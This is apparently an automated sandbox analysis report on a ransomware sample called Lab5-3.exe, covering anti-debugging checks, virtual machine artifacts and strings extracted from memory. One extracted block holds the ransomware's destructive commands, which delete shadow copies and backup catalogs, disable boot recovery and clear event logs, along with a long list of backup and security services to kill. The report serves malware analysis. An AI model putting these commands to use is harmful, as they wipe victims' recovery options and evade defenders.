                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00410170 RtlEnterCriticalSection,lstrcmpiW,lstrcmpiW,wsprintfW,wsprintfW,FindFirstFileExW,RtlLeaveCriticalSection,ExitThread,RtlExitUserThread,FindClose,wsprintfW,CreateFileW,RtlLeaveCriticalSection,ExitThread,malloc,RtlLeaveCriticalSection,SHEmptyRecycleBinW,GetDiskFreeSpaceExW,SetThreadUILanguage,StrFormatByteSize64A,StrFormatByteSize64A,StrFormatByteSize64A,wsprintfA,CloseHandle,DeleteFileW,ExitThread,27_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00410530 GetFileAttributesW,SetFileAttributesW,wsprintfW,FindFirstFileExW,FindNextFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,PathFindExtensionW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathAddBackslashW,SetFileAttributesW,FindNextFileW,FindNextFileW,FindClose,27_2_00410530
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000006500000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Lab5-3.exe, 00000000.00000003.2478753304.0000000006B93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: vds.exe, 00000012.00000003.1765347820.00000291E2335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000003.1766332662.00000291E2335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}D
                      Source: vds.exe, 00000012.00000003.1766736913.00000291E2337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Lab5-3.exeBinary or memory string: vmware-converter
                      Source: Lab5-3.exe, 00000000.00000003.2469097133.000000001B495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 10/04/2023 10:57:53.172EXCEL (0xD50)0x3DCMicrosoft ExcelTelemetry Eventb7vzqMediumSendEvent {"EventName":"Office.System.SystemHealthMetadataDeviceConsolidated","Flags":33777031581908737,"InternalSequenceNumber":104,"Time":"2023-10-04T10:57:52.477Z","Rule":"120600.4","Contract":"Office.Legacy.Metadata","Data.ProcTypeText":"x64","Data.ProcessorCount":2,"Data.NumProcShareSingleCore":1,"Data.NumProcShareSingleCache":1,"Data.NumProcPhysCores":2,"Data.ProcSpeedMHz":2000,"Data.IsLaptop":false,"Data.IsTablet":false,"Data.RamMB":4096,"Data.PowerPlatformRole":1,"Data.SysVolSizeMB":50000,"Data.DeviceManufacturer":"VMWare, Inc.","Data.DeviceModel":"VMware20,1","Data.DigitizerInfo":0,"Data.SusClientId":"097C77FB-5D5D-4868-860B-09F4E5B50A53","Data.WindowsSqmMachineId":"92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","Data.ComputerSystemProductUuidHash":"rC2kkStHpWGLvfAgmQZRz4w5ixE=","Data.DeviceProcessorModel":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","Data.HasSpectreFix":true,"Data.BootDiskType":"SSD"}
                      Source: bcdedit.exe, 00000046.00000002.1965550650.0000025541E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM
                      Source: vds.exe, 00000012.00000003.1745629461.00000291E2323000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000A5
                      Source: Lab5-3.exe, 00000000.00000003.1903327152.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2061452303.0000000000754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: bcdedit.exe, 00000052.00000002.1981632096.000001B9E2318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: vds.exe, 00000012.00000003.1765453986.00000291E2335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000003.1746117129.00000291E231A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000003.1766797826.00000291E2335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\DosDevices\Y:\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
                      Source: Lab5-3.exe, 0000001B.00000003.2077175545.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                      Source: vds.exe, 00000012.00000003.1746117129.00000291E231A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
                      Source: Lab5-3.exe, 00000000.00000003.2478753304.0000000006B93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Lab5-3.exeBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000003.1767028203.00000291E2334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD000
                      Source: vds.exe, 00000012.00000003.1766846895.00000291E233E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: vds.exe, 00000012.00000002.3758258503.00000291E22EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 00000012.00000003.1759483377.00000291E231A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Lab5-3.exeBinary or memory string: vmware-usbarbitator64
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI call chain: ExitProcess graph end nodegraph_19-4296
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI call chain: ExitProcess graph end nodegraph_19-4374
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI call chain: ExitProcess graph end nodegraph_19-4359
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI call chain: ExitProcess graph end nodegraph_19-4282
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI call chain: ExitProcess graph end nodegraph_27-4299
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebuggerJump to behavior
